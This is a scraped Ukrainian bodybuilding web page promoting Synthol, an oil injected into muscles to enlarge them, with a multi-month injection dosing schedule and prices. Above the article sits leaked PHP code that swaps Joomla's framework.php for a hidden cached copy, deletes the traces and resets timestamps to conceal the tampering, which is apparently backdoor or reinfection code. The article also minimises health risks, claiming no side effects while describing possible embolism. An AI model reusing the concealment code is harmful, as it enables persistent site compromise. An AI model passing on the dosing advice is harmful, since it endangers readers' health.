$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Синтол | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Синтол

синтол Усе почалося з того, що на початку 90- х, коли німецький хімік і культурист Крис Кларк задумав створити аналог препарату ециклен (Ециклен атлети вколюють в окремі м'язи й м'язові групи перед змаганнями для тимчасового ефекту збільшення м'язових об'ємів, ін'єкції дуже болісні і мають тимчасовий ефект (об'єм "тримається" усього декілька днів).

Можна було б подумати що, Кларк поставив перед собою нездійсненне завдання - створити аналог Ециклена, дія якого б тривала роками. І йому це вдалося! Цей склад він назвав Синтол - так називається одна із найбільш потужних технологій ядерного синтезу. Але з'ясувалося, що назва вже запатентована в декількох країнах, причому не в області ядерної фізики, а в медицині. Тому придумали нову торговельну марку "Pump N'роsе" (Накачайся і позуй). Під цієї маркою він і продається по усьому світу у величезних обсягах. Однак серед культуристів міцно вкоренилася назва Синтол, під яким почалися перші продажі. Сьогодні ця назва добре прижилася в лексиці качків, як метан або дека. Мільйони культуристів у наші дні боготворять винахід Кларка.

Насправді , чи багато хто може накачати руки до 50 см, навіть застосовуючи величезні дози стероїдів? А із Синтолом це дуже просто! До того ж, Синтол не має побічних ефектів стероїдів.Так, що ж представляє із себе синтол? Синтол - препарат міжм'язової жирової кислоти. Представляє із себе синтетичне масло, що вводиться в м'яз, який потрібно збільшити. Принцип роботи препарату полягає в тому, що він проникає в проміжки між м'язовими волокнами (якби "просочуючись" між ними), де він і залишається, викликаючи в такий спосіб збільшення об'ємів мязів. Близько 30 відсотків препарату майже негайно розщеплюється ферментами організму й виводиться в обмін речовин, як звичайний жир. Який працює, як швидкозгоряюче паливо для м'язів, тобто не відбувається жирових відкладань. 70 відсотків, що залишилися зберігаються в м'язах протягом 3-5 років, поступово розпадаючись на елементарні жирові фрагменти, та виводиться печінкою. Багато культуристів стверджують, що препарат діє довше - до 8 років.

Dan Duchaine (спеціаліст по стероїдам) проводив аналіз зразка Синтола й дійшов висновку, що препарат складається на 85 відсотків з жирних кислот: в основному типу C8, деяка кількість C10, і близько 3% C12 (буква C і цифри поле її показують, довжину жирового ланцюжка - коротка, середня або довга). Препарат також містить 7.5% лідокаїн (lidocaine) - знеболюючий засіб і 7.5% бензил - алкоголь (benzyl - alcohol). Виробники препарату запевняють, що нічого поганого звичайні жири заподіяти не можуть. Більше того, жири, які офіційно визнані як дуже корисні для здоров'я. Однак самі по собі ін'єкції будь-якого чужорідного складу можуть бути дуже небезпечні. Якщо ви випадково потрапите голкою в один із кровоносних посудин, це може призвести до  серйозних ушкоджень тканин "нижче за течією кровотока". Жировий склад збирається в кулю й може намертво закупорить кровоток. Порушення кровообігу викличе серцевий приступ, а якщо вчасно не надати медичну допомогу, то й смерть.Однак поки не було офіційно зареєстроване жодного смертельного випадку, пов'язаного із застосуванням Синтола.

Керівництво IFBB однозначне прирівняло Синтол до стероїдів і офіційно заборонило його використання. Цікаво, що продавці Синтола у всіх країнах "ходять по лезу бритви" на межі законності. Якби Синтол привернув увагу як препарат для внутрішньом'язових ін'єкцій, то був би безумовно заборонений у всіх країнах, і насамперед у Німеччині,  де був винайдений. От тому Синтол увозять і продають як... "масло для позування".

Ефективне дозування синтолу: протягом перших 20 днів щодня по 1 мол. Ще 10 днів - по 2 мол. Потім по 3 мол щодня, поки м'яз буде збільшувати свій об'єм. Коли ріст об'єму припиниться, протягом 30 днів по 1 мол щодня. Ще 30 днів - по 1 мол двічі в день. Потім по 1 мол у тиждень протягом 1 місяця. Тільки після проходження такого курсу приріст об'єму м'яза стане постійним, і м'яз не зменшиться. Після трьохтижневого курсу руки збільшуються на 5-6 см і тримають об'єм досить довго. Через 4 місяця курс треба повторити знову: можливо, вдасться добитися нової "прибавки" об'єму .

Ціна справжнього Синтола коливається в межах 300-400 доларів за пляшечку.

Джерело: http://athlete.ru/

Приймання Синтолу додає об'єм, але естетичний вигляд тіла накачанного синтолом "бажає кращого", а деколи і має просто жахливий, нереальний вигляд. Можна порівняти такі біцепси с силіконовими цицьками на руках :)  Хоча силікон в цицьках має кращих вигляд ;)

В розділі фото дивіться категорію синтолові мязи

syntol

syntol9


 
Статті СТЕРОЇДИ Синтол